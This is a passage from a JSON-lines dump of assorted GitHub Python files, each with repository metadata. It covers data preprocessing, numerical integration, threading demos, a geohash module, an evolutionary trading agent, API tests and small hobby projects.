df.groupby(\"agas_code\")[\"accumulated_recoveries\"].diff()\n\n # some na's might have been created\n df[\"new_deaths\"] =df[\"new_deaths\"].fillna(0)\n df[\"new_recoveries\"] =df[\"new_recoveries\"].fillna(0)\n df[\"new_cases_percent\"] = df[\"new_cases_percent\"].fillna(0)\n df = df.replace(np.inf, 100)\n df = df.replace(-np.inf, -100)\n return df\n\n\n# %%\ndef preprocess(df: pd.DataFrame) -> pd.DataFrame:\n df = fill_strange_vals(df)\n df = cols_to_int(df)\n bin_to_int(df)\n df = calc_changes(df)\n df = drop_cols(df)\n return df\n\n\n","repo_name":"michaelsich/Covid19-sectors-JLM","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2567088917","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nEX6.5.1.py\n\nGauss-Legendre quadrature of a function in 1-dimension\n\nProblem description:\n \n Integrate f(x)=l + x^2 - 3x^3 + 4x^5 between x = -1 and x = 1\n\nVariable descriptions:\n point1 = integration (or sampling) points\n weight1 = weighting coefficients\n ngl = number of integration points\n\"\"\"\n\nimport feglqd1\n\nngl = 3 # (2*ngl - 1) = 5\npoint1, weight1 = feglqd1.feglqd1(ngl) # extract sampling points and weights\n\n# -----------------------------------\n# summation for numerical integration\n# -----------------------------------\nvalue = 0.0\nfor int in range(ngl):\n x = point1[int]\n wt = weight1[int]\n func = 1 + x**2 -3*x**3 + 4*x**5 # evaluate function at sampling point\n value = value + func*wt\n\nprint(value) # print the solution","repo_name":"PNMZR/Python3_FEM_Codes_Recomposed_from_Other_Programming_Languages","sub_path":"FEMM/example6_5_1.py","file_name":"example6_5_1.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34319469624","text":"class Auto:\n def __init__(self, registracni_znacka, typ_vozidla, najete_km):\n self.registracni_znacka = registracni_znacka\n self.typ_vozidla = typ_vozidla\n self.najete_km = int(najete_km)\n self.dostupne = True\n\n def pujc_auto(self):\n if self.dostupne == True:\n print(\"Potvrzuji zapůjčení vozidla\")\n self.dostupne = False\n else:\n print(\"Vozidlo není k dispozici\")\n\n def getInfo(self):\n print (f\"Auto {self.typ_vozidla} registrační značky {self.registracni_znacka}.\")\n\n \nauto_peugeut = Auto(\"4A2 3020\", \"Peugeot 403 Cabrio\", 47534)\nauto_skoda = Auto(\"1P3 4747\", \"Škoda Octavia\", 41253 )\n\nvypujceni_auta = input(\"Jaké vozidlo si přejete půjčit? Máme v nabídce Peugeot a Škoda.\")\n\nif vypujceni_auta == \"Škoda\":\n auto_skoda.pujc_auto()\n auto_skoda.getInfo()\nelif vypujceni_auta == \"Peugeot\":\n auto_peugeut.pujc_auto()\n auto_peugeut.getInfo()\nelse:\n print(\"Zadejte jiné auto.\")\n\nvypujceni_auta = input(\"Jaké vozidlo si ještě přejete půjčit? Máme v nabídce Peugeot a Škoda.\")\n\nif vypujceni_auta == \"Škoda\":\n auto_skoda.pujc_auto()\n auto_skoda.getInfo()\nelif vypujceni_auta == \"Peugeot\":\n auto_peugeut.pujc_auto()\n auto_peugeut.getInfo()\nelse:\n print(\"Zadejte jiné auto.\")\n\n\n\n\n\n\n\n\n\n","repo_name":"alenaturonova/python1-kurz2023","sub_path":"ukol7.py","file_name":"ukol7.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21116699365","text":"import time\nfrom benchlog import BenchLog\n\nlogging = BenchLog('test', 10000, ['testa','testb'])\nlogging.setHost('http://localhost:3000')\narray = []\nlogging.enableGPU(0)\nlogging.start()\nfor i in range(1,10000):\n temp = [None] * i\n array.append(temp)\n if(i % 1000 == 0):\n logging.log(i)\nlogging.end()\n","repo_name":"Keydex/BenchLog","sub_path":"test/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22618529236","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('stats', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='stats',\n name='poll_response',\n field=models.IntegerField(default=0, blank=True),\n ),\n ]\n","repo_name":"wizcarder/wizcard-server","sub_path":"stats/migrations/0002_stats_poll_response.py","file_name":"0002_stats_poll_response.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1943312975","text":"from typing import List\n\nfrom bst_node import BstNode\nfrom test_framework import generic_test, test_utils\n\n# This solution works \n# def find_k_largest_in_bst(tree: BstNode, k: int) -> List[int]:\n# def helper(cur):\n# if not cur:\n# return\n# helper(cur.left)\n# ans.append(cur.data)\n# helper(cur.right) \n \n# ans = []\n# helper(tree)\n# return list(reversed(ans))[:k]\n\n# This solution works\ndef find_k_largest_in_bst(tree: BstNode, k: int) -> List[int]:\n def helper(cur):\n nonlocal k \n if not cur:\n return \n if k == 0:\n return \n helper(cur.right)\n if k > 0:\n ans.append(cur.data)\n k -= 1\n helper(cur.left)\n ans = []\n helper(tree)\n return ans\n \n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('k_largest_values_in_bst.py',\n 'k_largest_values_in_bst.tsv',\n find_k_largest_in_bst,\n test_utils.unordered_compare))\n","repo_name":"akimi-yano/EPIJudge","sub_path":"epi_judge_python/k_largest_values_in_bst.py","file_name":"k_largest_values_in_bst.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71259636853","text":"#from imagetoarraypreprrocessor import ImagetOArrayPreproessor\n#from simplepreprocessor import SimplePreprocessor\n#from simpledatasetloader import SimpleDatasetLoader\nfrom keras.models import load_model\nfrom imutils import paths\nimport numpy as np\nimport argparse\nimport cv2\nfrom keras.preprocessing.image import img_to_array\n\nap=argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\",required=True,help=\"path to image to be predicted\")\nap.add_argument(\"-m\",\"--model\",required=True,help=\"path to load model\")\nargs=vars(ap.parse_args())\n\ndata=[]\nlabels=[\"bullettrain\",\"dugong\",\"elephant\",\"espresso\",\"lemon\",\"lion\",\"penguin\",\"potterwheel\",\"schoolbus\",\"steelarchbridge\",\"watertower\"]\nimage=cv2.imread(args[\"image\"])\ncv2.imshow(\"zx\",image)\ncv2.waitKey(0)\nimage=cv2.resize(image,(32,32),interpolation=cv2.INTER_AREA)\n\n\ndata.append(img_to_array(image,data_format=None))\ndata=np.array(data)\ndata=data.astype(\"float\")/255.0\n\nprint(\"[INFO] loading pre-trained network...\")\t\t\nmodel=load_model(args[\"model\"])\n\npred=model.predict(data,batch_size=1)\nprint(pred)\nprint(max(max(pred)))\n\n\n","repo_name":"Chinmay-20/Classification-of-simple-classes-in-Tiny-ImageNet-200","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19980669330","text":"\n# coding: utf-8\n\n# In[12]:\n\n\nimport multiprocessing as mp\n\ndef job(q, a, d):\n res = 0\n for i in range(1000):\n res += i + i**2 + i**3\n q.put(res) # queue\n\n\nif __name__=='__main__':\n q = mp.Queue()\n p1 = mp.Process(target=job,args=(q,))\n p2 = mp.Process(target=job,args=(q,))\n p1.start()\n p2.start()\n p1.join()\n p2.join()\n res1 = q.g\n\n\n# In[ ]:\n\n\nimport multiprocessing as mp\n\n# share memery\nvalue = mp.Value('d', 1)\narray = mp.Array('i', [1, 2, 3])\n\n\n# In[5]:\n\n\nimport multiprocessing as mp\nimport time\ndef job(v, num, l):\n l.acquire() # 锁住\n for _ in range(5):\n time.sleep(0.1) \n v.value += num # 获取共享内存\n print(v.value)\n l.release() # 释放\n\ndef multicore():\n l = mp.Lock() # 定义一个进程锁\n v = mp.Value('i', 0) # 定义共享内存\n p1 = mp.Process(target=job, args=(v,1,l)) # 需要将lock传入\n p2 = mp.Process(target=job, args=(v,3,l)) \n p1.start()\n p2.start()\n p1.join()\n p2.join()\n\nif __name__ == '__main__':\n multicore()\n\n\n# In[10]:\n\n\nimport threading\n\ndef thread_job():\n print(\"This is an added Thread, number is %s\"% threading.current_thread)\n \ndef main():\n added_thread = threading.Thread(target = thread_job)\n added_thread.start()\n# print(threading.active_count())\n# print(threading.enumerate())\n# print(threading.current_thread())\n \nif __name__ == '__main__':\n main()\n\n\n# In[15]:\n\n\n# 多线程\nimport threading\nimport time\n\ndef thread_job():\n print(\"T1 start\\n\")\n for i in range(10):\n time.sleep(0.1)\n print(\"T1 finish \\n\")\n \ndef thread_job2():\n print(\"T2 start\\n\")\n print(\"T2 finish \\n\")\ndef main():\n added_thread = threading.Thread(target = thread_job, name = \"T1\")\n thread2 = threading.Thread(target = thread_job2, name = \"T2\" )\n added_thread.start()\n thread2.start()\n added_thread.join()\n thread2.join()\n print(\"all done\\n\")\n \n# print(threading.active_count())\n# print(threading.enumerate())\n# print(threading.current_thread())\n \nif __name__ == '__main__':\n main()\n\n\n# In[ ]:\n\n\nimport threading\nimport time\n\nfrom queue import Queue\n\ndef job(l,q):\n for i in range (len(l)):\n l[i] = l[i]**2\n q.put(l)\n\ndef multithreading():\n q =Queue()\n threads = []\n data = [[1,2,3],[3,4,5],[4,4,4],[5,5,5]]\n for i in range(4):\n t = threading.Thread(target=job,args=(data[i],q))\n t.start()\n threads.append(t)\n for thread in threads:\n thread.join()\n results = []\n for _ in range(4):\n results.append(q.get())\n print(results)\n\nif __name___=='__main__':\n multithreading()\n\n\n# In[1]:\n\n\nimport threading\nfrom queue import Queue\nimport copy\nimport time\n\ndef job(l, q):\n res = sum(l)\n q.put(res)\n\ndef multithreading(l):\n q = Queue()\n threads = []\n for i in range(4):\n t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)\n t.start()\n threads.append(t)\n [t.join() for t in threads]\n total = 0\n for _ in range(4):\n total += q.get()\n print(total)\n\ndef normal(l):\n total = sum(l)\n print(total)\n\nif __name__ == '__main__':\n l = list(range(1000000))\n s_t = time.time()\n normal(l*4)\n print('normal: ',time.time()-s_t)\n s_t = time.time()\n multithreading(l)\n print('multithreading: ', time.time()-s_t)\n\n\n# In[ ]:\n\n\nimport threading\n\ndef job1():\n global A,lock\n lock.acquire()\n for i in range(10):\n A+=1\n print('job1',A)\n lock.release()\n\ndef job2():\n global A,lock\n lock.acquire()\n for i in range(10):\n A+=10\n print('job2',A)\n lock.release()\n\nif __name__== '__main__':\n lock=threading.Lock()\n A=0\n t1=threading.Thread(target=job1)\n t2=threading.Thread(target=job2)\n t1.start()\n t2.start()\n t1.join()\n t2.join()\n\n","repo_name":"Koala111/Python","sub_path":"progress/Thread.py","file_name":"Thread.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5611332325","text":"from aocd.models import Puzzle\n\n\ndef travel(data):\n # start at origin\n x = 0\n y = 0\n\n # define a set of houses\n houses = {x, y}\n\n # go through each direction\n for d in data:\n if d == \"^\":\n y += 1\n elif d == \"v\":\n y -= 1\n elif d == \">\":\n x += 1\n elif d == \"<\":\n x -= 1\n\n # add the new house to the set\n houses.add((x, y))\n\n return houses\n\n\ndef part1(data):\n # check the length of the set of houses\n return len(travel(data))\n\n\ndef part2(data):\n\n # split data into santa and robot santa directions\n santa = data[0::2]\n robot_santa = data[1::2]\n\n # get the set of houses for each\n santa_houses = travel(santa)\n robot_santa_houses = travel(robot_santa)\n\n # return the length of the union of the two sets\n return len(santa_houses.union(robot_santa_houses)) - 1\n\n\nif __name__ == \"__main__\":\n\n # import unique puzzle data\n puzzle = Puzzle(2015, 3)\n raw = puzzle.input_data\n\n answer1 = part1(raw)\n answer2 = part2(raw)\n\n print(f\"Part 1: {answer1}\")\n print(f\"Part 2: {answer2}\")\n","repo_name":"anissa111/advent-of-code","sub_path":"2015/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35247710703","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport os\n\n\nclass Preprocess:\n\n # 整理后版本\n\n @staticmethod\n def extract_data(train_dir, test_dir, yoochoose_data_dir, yoochoose_selected_dir, setting=0):\n\n # 提取分类实验数据集\n\n # 输入数据路径(注意:这里用于训练和测试的session_item.txt数据都来源于原始数据中的训练集点击和购买数据)\n train_session_path = train_dir + r'\\session_item.txt'\n test_session_path = test_dir + r'\\session_item.txt'\n\n # 输入路径\n # early predict-截断数据setting设置为1,非截断数据设置为0。\n # early predict-注意这里截断数据和非截断数据的yoochoose_data_dir不同\n if setting == 1:\n # 截断数据的点击数据是到第一个购买商品时截断的。\n clicks_path = yoochoose_data_dir + r'\\yoochoose-clicks-selected.dat'\n buys_path = yoochoose_data_dir + r'\\yoochoose-buys-selected.dat'\n else:\n clicks_path = yoochoose_data_dir + r'\\yoochoose-clicks.dat'\n buys_path = yoochoose_data_dir + r'\\yoochoose-buys.dat'\n\n # 输出路径\n clicks_selected_path = yoochoose_selected_dir + r'\\yoochoose-clicks-selected.dat'\n buys_selected_path = yoochoose_selected_dir + r'\\yoochoose-buys-selected.dat'\n # (注意:这里yoochoose-test-selected.dat文件的数据并非来源于yoochoose-test.dat文件,而是来源于yoochoose-clicks.dat\n # 和yoochoose-buys.dat文件,因为用于测试的session_item.txt数据也来源于原始数据中的训练集点击和购买数据)\n test_selected_path = yoochoose_selected_dir + r'\\yoochoose-test-selected.dat'\n\n # 提取实验数据session\n train_session = set()\n extract_session(train_session_path, train_session)\n test_session = set()\n extract_session(test_session_path, test_session)\n\n # 根据实验数据session进行提取yoochoose-data-selected\n extract_and_print_data(clicks_path, train_session, clicks_selected_path)\n extract_and_print_data(buys_path, train_session, buys_selected_path)\n # 加了下面这个判断\n # 注意截断数据测试数据的点击数据和非截断数据的应是一样的,即都是非截断的。\n # 若是截断数据,setting = 1\n if setting == 1:\n clicks_path = r\"E:\\ranking aggregation\\dataset\\yoochoose\\Full\" + r'\\yoochoose-clicks.dat'\n extract_and_print_data(clicks_path, test_session, test_selected_path)\n\n\ndef extract_session(file_path, session):\n file = open(file_path)\n try:\n for line in file:\n tmp = line.split(\";\")\n session_str = tmp[0]\n session.add(session_str)\n except Exception as e:\n print(e)\n finally:\n file.close()\n\n\n# 从点击数据文件中选出样本数据session中的点击数据并输出\ndef extract_and_print_data(in_file_path, session, out_file_path):\n in_file = open(in_file_path)\n out_file = open(out_file_path, 'w')\n try:\n for line in in_file:\n tmp = line.split(',')\n session_str = tmp[0]\n if session_str in session:\n out_file.write(line)\n except Exception as e:\n print(e)\n finally:\n in_file.close()\n out_file.close()\n\n\nif __name__ == '__main__':\n\n # 提取Full/extracted中session_item.txt中的session对应的yoochoose-clicks.dat和yoochoose-buys.dat\n main_dir = r'E:\\ranking aggregation\\dataset\\yoochoose\\Full'\n dataset_para = 'extracted'\n # 文件夹路径\n dataset_dir = main_dir + '\\\\' + dataset_para\n yoochoose_data_dir = main_dir\n # 输出文件夹路径\n yoochoose_selected_dir = dataset_dir + r'\\yoochoose-selected'\n # 文件路径\n RA_train_session_path = dataset_dir + r'\\session_item.txt'\n # 输入文件路径\n clicks_path = yoochoose_data_dir + r'\\yoochoose-clicks.dat'\n buys_path = yoochoose_data_dir + r'\\yoochoose-buys.dat'\n # 输出文件路径\n clicks_selected_path = yoochoose_selected_dir + r'\\yoochoose-clicks-selected.dat'\n buys_selected_path = yoochoose_selected_dir + r'\\yoochoose-buys-selected.dat'\n # 假如输出文件夹不存在,则创建文件夹\n if not os.path.exists(yoochoose_selected_dir):\n os.makedirs(yoochoose_selected_dir)\n\n # 提取实验数据session\n train_session = set()\n extract_session(RA_train_session_path, train_session)\n\n # 根据实验数据session进行提取yoochoose-data-selected\n extract_and_print_data(clicks_path, train_session, clicks_selected_path)\n extract_and_print_data(buys_path, train_session, buys_selected_path)\n","repo_name":"CaiMugino/RLSO","sub_path":"rlso/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35454597","text":"import os\n\nimport pygame\n\n\nASSETS_ROOT = os.path.join('assets', 'experiments', 'spaceArt', 'png')\nLOGO_FILE = os.path.join(ASSETS_ROOT, 'life.png')\n\nTEST_IMAGE = os.path.join(ASSETS_ROOT, 'laserRedShot.png')\n\nHEIGHT = 1080\nWIDTH = 1920\n\ndef main():\n pygame.init()\n logo = pygame.image.load(LOGO_FILE)\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Test program\")\n\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n image = pygame.image.load(TEST_IMAGE)\n x = 0\n y = 0\n x_mul = 1\n y_mul = 1\n\n running = True\n index = 0\n\n while running:\n for event in pygame.event.get():\n screen.blit(image, (x, y))\n pygame.display.flip()\n\n x += x_mul\n y += y_mul\n\n if x == WIDTH - 1 or x == 0:\n x_mul *= -1\n if y == HEIGHT - 1 or y == 0:\n y_mul *= -1\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n print(event.key)\n print(\"{0}: You pressed {1:c}\".format(index, event.key))\n elif event.type == pygame.KEYUP:\n print(\"{0}: You released {1:c}\".format(index, event.key))\n index += 1\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"tudorvaran/university","sub_path":"vgd/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"16258774653","text":"# coding: UTF-8\r\n\"\"\"\r\nCopyright (C) 2009 Hiroaki Kawai \r\n\"\"\"\r\ntry:\r\n\timport _geohash\r\nexcept ImportError:\r\n\t_geohash = None\r\n\r\ndef _encode_i2c(lat,lon,bitlength):\r\n\tdigits='0123'\r\n\tr = ''\r\n\twhile bitlength>0:\r\n\t\tr += digits[((lat&1)<<1)+(lon&1)]\r\n\t\tlat = lat>>1\r\n\t\tlon = lon>>1\r\n\t\tbitlength -= 1\r\n\t\r\n\treturn r[::-1]\r\n\r\ndef _decode_c2i(treecode):\r\n\tlat = 0\r\n\tlon = 0\r\n\tfor i in treecode:\r\n\t\tb = ord(i)-48\r\n\t\tlat = (lat<<1)+int(b/2)\r\n\t\tlon = (lon<<1)+b%2\r\n\t\r\n\treturn (lat,lon,len(treecode))\r\n\r\ndef encode(lat,lon,precision=12):\r\n\tif _geohash and precision<=64:\r\n\t\tints = _geohash.encode_int(lat, lon)\r\n\t\tret = \"\"\r\n\t\tfor intu in ints:\r\n\t\t\tfor i in range(int(_geohash.intunit/2)):\r\n\t\t\t\tif len(ret) > precision:\r\n\t\t\t\t\tbreak\r\n\t\t\t\tret += \"0213\"[(intu>>(_geohash.intunit-2-i*2))&0x03]\r\n\t\t\r\n\t\treturn ret[:precision]\r\n\t\r\n\tb = 1<>bitlength:\r\n\t\tfor tlon in (lon-1, lon, lon+1):\r\n\t\t\tr.append(_encode_i2c(tlat, tlon, bitlength))\r\n\t\r\n\ttlat = lat-1\r\n\tif tlat>=0:\r\n\t\tfor tlon in (lon-1, lon, lon+1):\r\n\t\t\tr.append(_encode_i2c(tlat, tlon, bitlength))\r\n\t\r\n\treturn r\r\n\r\ndef expand(treecode):\r\n\tr = neighbors(treecode)\r\n\tr.append(treecode)\r\n\treturn r\r\n\r\n","repo_name":"fleetdm/fleet","sub_path":"infrastructure/sandbox/Data/lambda/quadtree.py","file_name":"quadtree.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1714,"dataset":"github-code","pt":"21"} +{"seq_id":"12798003486","text":"import numpy as np\nimport random\nimport cma\nimport json\nimport copy\nimport math\nimport sys\nimport os\n\nfrom simulation.SnetAgent import SnetAgent\n\n\nclass SISTER(SnetAgent):\n def __init__(self, unique_id, model, message, parameters):\n super().__init__(unique_id, model, message, parameters)\n\n # SISTER uses CMA-ES on float vectors, that are then converted\n # to trade plans. If an initial message is put on the board,\n # this is converted to a floatvec, and is used to initialize cma-es\n\n vs = self.vector_size()\n self.initialVec = np.random.uniform(low=0.0, high=1.0, size=(vs,))\n if not message:\n self.message, float_vec = self.float_vec_to_trade_plan(self.initialVec)\n self.initial_trade_plan = None\n else:\n\n self.initial_trade_plan = copy.deepcopy(self.message)\n mask = copy.deepcopy(self.initial_trade_plan)\n self.message, float_vec = self.float_vec_to_trade_plan(self.initialVec, mask)\n\n self.float_vec = float_vec\n self.model.blackboard.append(self.message)\n\n seed = random.randint(1,1000000)\n params = {'bounds': [0.0, 1.0], 'seed': seed, 'CMA_elitist': self.parameters['elitist']}\n self.es = cma.CMAEvolutionStrategy(self.initialVec, self.parameters['sigma'], params )\n self.solutions = self.es.ask()\n self.results = []\n self.next_solution = 0\n\n self.agiTokens = 0\n self.max_buyer_score = 0\n self.max_seller_score = 0\n\n print (\"IN SISTER init,\"+self.b[self.unique_id]['label'])\n\n\n\n def step(self):\n\n print(\"IN SISTER step,\"+self.b[self.unique_id]['label']+ \" time \"+ str(self.model.schedule.time))\n # print(self.b[self.unique_id]['label'] + ' in step')\n\n # append put the cumulative token reward as the reward for the last solution\n result = self.agiTokens * self.parameters['fitness_weights']['agi_tokens'] \\\n + self.max_buyer_score * self.parameters['fitness_weights']['buyer_score'] \\\n + self.max_seller_score * self.parameters['fitness_weights']['seller_score']\n\n bought_items = self.get_bought_items()\n self.results.append(result)\n self.model.print_reproduction_report_line(self,result, bought_items)\n\n\n # move a cursor that tells which solution you are on.\n # if there are none left, tell then ask, clearing reward buffer, resettinng cursor\n # take the next solutions and put the message on the blackboard\n self.next_solution += 1\n if self.next_solution >= len(self.solutions):\n #Checkpoints as false enables the cma-es to accept the fixed solution seeds (partially fixed solutions)\n # that are set parts of the space to evolve around\n self.es.tell(self.solutions, self.results, check_points=False)\n self.results= []\n self.next_solution = 0\n self.solutions = self.es.ask()\n\n\n mask = None\n if self.initial_trade_plan:\n step = math.floor(self.model.schedule.time)\n initial_message = self.initial_trade_plan['initial_message'] \\\n if 'initial_message' in self.initial_trade_plan else 0\n final_message = self.initial_trade_plan['final_message'] \\\n if 'final_message' in self.initial_trade_plan else sys.maxsize\n message_period = self.initial_trade_plan['message_period'] \\\n if 'message_period' in self.initial_trade_plan else 1\n\n if step >= initial_message and step <= final_message and step % message_period == 0:\n mask = copy.deepcopy(self.initial_trade_plan)\n\n new_message, float_vec = self.float_vec_to_trade_plan(self.solutions[self.next_solution],mask)\n\n\n\n self.agiTokens = 0\n self.max_buyer_score = 0\n self.max_seller_score = 0\n self.set_message(new_message)\n self.float_vec = float_vec\n\n\n def buyer_score_notification(self, score, tradenum):\n #print(self.b[self.unique_id]['label'] + ' wealth changes by ' + agiTokens + ' because of trade ' + str(tradenum))\n if self.max_buyer_score < score:\n self.max_buyer_score = score\n\n def seller_score_notification(self, score, tradenum):\n #print(self.b[self.unique_id]['label'] + ' wealth changes by ' + agiTokens + ' because of trade ' + str(tradenum))\n if self.max_seller_score < score:\n self.max_seller_score = score\n\n def payment_notification(self, agiTokens, tradenum):\n #print(self.b[self.unique_id]['label'] + ' wealth changes by ' + agiTokens + ' because of trade ' + str(tradenum))\n self.agiTokens += agiTokens","repo_name":"singnet/simulation","sub_path":"simulation/SISTER.py","file_name":"SISTER.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"4805973312","text":"# Author:zqbin\n# @Time:2023/9/26 14:07\n# @Author:14988\n# @Site:\n# @File:test_register.py\n# @Software:PyCharm\nimport unittest\nfrom lib.mysql_client import MySQLClient\nfrom lib.logger import Logger\nfrom lib.http_client import HTTPClient\nfrom jsonpath import jsonpath\n\n\nclass TestRegister01(unittest.TestCase):\n __logger = Logger()\n __httpclient = HTTPClient()\n\n @classmethod\n def setUp(cls) -> None:\n cls.__logger.info(\"开始执行测试用例--注册接口\")\n client = MySQLClient()\n sql1 = 'delete from auth_user where username=\"test926_901\"'\n sql2 = 'delete from user_profile where name=\"test926_901\"'\n client.execute([sql1, sql2])\n\n @classmethod\n def tearDown(cls) -> None:\n client = MySQLClient()\n sql1 = 'delete from auth_user where username=\"test926_901\"'\n sql2 = 'delete from user_profile where name=\"test926_901\"'\n client.execute([sql1, sql2])\n cls.__logger.info(\"结束执行测试用例--注册接口\")\n\n def test_method(self):\n method = \"post\"\n data = {\n \"name\": \"test926_901\",\n \"password1\": \"123456\",\n \"password2\": \"123456\"\n }\n r = self.__httpclient.request('/register/', method=method, json=data)\n\n expectValue = 200\n currentValue = r.status_code\n self.assertEqual(expectValue, currentValue)\n\n expectValue = '200'\n # currentValue = r.json()['code']\n currentValue = jsonpath(r.json(), '$..code')[0]\n # TestRegister01.__logger.info(f'currentValue={currentValue}')\n self.assertEqual(expectValue, currentValue)\n\n expectValue = 1\n client = MySQLClient()\n sql1 = 'select * from auth_user where username=\"test926_901\"'\n sql2 = 'select * from user_profile where name=\"test926_901\"'\n retList = client.execute([sql1, sql2])\n currentValue = retList[0]\n self.assertEqual(expectValue, currentValue)\n currentValue = retList[1]\n self.assertEqual(expectValue, currentValue)\n","repo_name":"FoXM999/ceniu","sub_path":"api_test/testcase/test_register.py","file_name":"test_register.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73706420854","text":"import os\nimport re\nfrom flask import Flask, jsonify, render_template, request, url_for\nfrom flask_jsglue import JSGlue\n\nfrom cs50 import SQL\n\n\n# configure application\napp = Flask(__name__)\nJSGlue(app)\n\n\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n\n\n\n\n\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Render map.\"\"\"\n if not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n return render_template(\"index.html\", key=os.environ.get(\"API_KEY\"))","repo_name":"bhuvanchopra/cs50","sub_path":"bhuvanchopra-cs50-2017-x-project/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28303846832","text":"from picorobotics import PicoRobotics\nimport utime\nfrom client import client_pico\n\nboard = PicoRobotics.KitronikPicoRobotics()\ndirections = [\"f\",\"r\"]\n\ndef test():\n while True:\n for direction in directions:\n for stepcount in range(200):\n board.step(1,direction,8)\n board.step(2,direction,8)\n utime.sleep_ms(500)#pause between motors\n\n\n\n\nif __name__ == '__main__':\n pos_start = {'az': 0.0,\n 'alt': 0.0\n }\n pos_crnt = pos_start\n\n az_last = 0\n alt_last = 0\n\n\n\n while True:\n data = client_pico.main()\n az = data[0]\n alt = data[2]\n\n az_delta = az + az_last\n alt_delta = alt + alt_last\n\n board.stepAngle(1,1,alt_delta,holdPosition=True)\n\n\n\n\n\n\n\n","repo_name":"albioninnovate/Pointer","sub_path":"picorobotics/main_Stepper.py","file_name":"main_Stepper.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27618012597","text":"from datetime import datetime\nimport pytz\nfrom django.conf import settings\nfrom django.db.models import QuerySet\n\n\nclass MessageQuerySet(QuerySet):\n def create_message(self, data, chat, type):\n type = type or self.model.TYPE_TEXT\n \"\"\" Creates botmother Messages \"\"\"\n tz = pytz.timezone(settings.TIME_ZONE)\n date = datetime.utcfromtimestamp(data.get('date')).replace(tzinfo=tz) if data.get('date') else datetime.now()\n message = self.model(\n chat=chat,\n id=data.get('message_id') or data.get('id'),\n text=data['text'],\n date=date,\n type=type,\n )\n # message.save()\n\n return message\n","repo_name":"mondaylabs/botmother","sub_path":"botmother/querysets/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24250697322","text":"# -*- coding: utf-8 -*-\n\nfrom functools import wraps\n\n\ndef call_once(func):\n store = {\n \"has_run\": False,\n \"return\": None,\n }\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if not store[\"has_run\"]:\n store[\"has_run\"] = True\n store[\"return\"] = func(*args, **kwargs)\n return store[\"return\"]\n return wrapper\n","repo_name":"cfeitong/chat-bot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36379923455","text":"a=str(input().strip())\r\nmid=len(a)//2\r\nm,k=[],mid+1\r\nfor i in range(mid):\r\n m.append(\" \"*(i)+a[i]+\" \"*(len(a)-k)+a[-(i+1)]+\" \"*(i))\r\n k+=1\r\nfor x in m:\r\n print(x)\r\nprint(\" \"*(mid//2)+a[mid]+\" \"*(mid//2))\r\nfor x in m[::-1]:\r\n 